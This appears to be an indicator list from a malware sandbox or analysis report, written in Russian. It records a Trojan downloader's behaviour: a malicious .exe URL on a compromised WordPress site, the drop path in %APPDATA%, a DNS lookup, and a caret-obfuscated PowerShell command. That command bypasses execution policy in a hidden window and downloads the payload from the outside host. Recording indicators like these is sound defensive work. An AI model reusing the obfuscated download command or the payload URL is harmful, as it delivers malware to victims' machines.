Техническая информация
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^w^e^R^S^h^ell.exe -eXeCUT^iO^n^P^oli^CY BYP^as^s^ -^no^profil^e^ -wind^OwsTYle h^IdD^E^n (^NE^W^-oBJ^E^Ct ^SyStE^M.N^e^t.^w^e^BC^l^i^En^T).DoWN^L^oadFi^LE^('http://nsholid...
- %APPDATA%.exe
- 'ns###iday.com':80
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
- DNS ASK ns###iday.com
- '<SYSTEM32>\cmd.exe' /C "pO^w^e^R^S^h^ell.exe -eXeCUT^iO^n^P^oli^CY BYP^as^s^ -^no^profil^e^ -wind^OwsTYle h^IdD^E^n (^NE^W^-oBJ^E^Ct ^SyStE^M.N^e^t.^w^e^BC^l^i^En^T).DoWN^L^oadFi^LE^('http://nsholid...' (со скрытым окном)